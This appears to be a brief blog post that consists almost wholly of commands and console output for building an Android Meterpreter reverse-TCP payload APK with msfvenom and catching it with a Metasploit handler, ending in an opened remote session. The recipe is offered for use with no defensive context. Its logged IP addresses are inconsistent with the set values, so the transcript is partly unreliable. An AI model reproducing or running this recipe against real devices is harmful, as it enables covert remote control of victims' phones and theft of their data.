msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip kita] LPORT=1337 R > payload.apk
[email protected]:~# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [ip kita]
LHOST => 192.168.1.67
msf exploit(handler) > set LPORT 1337
LPORT => 1337
msf exploit(handler) > exploit
[*] Started reverse handler on 10.11.12.29:1337
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 10.11.12.179
[*] Meterpreter session 1 opened (10.11.12.29:1337 -> 10.11.12.179:49164) at 2015-9-03 02:07:42 +0700
Leave a Reply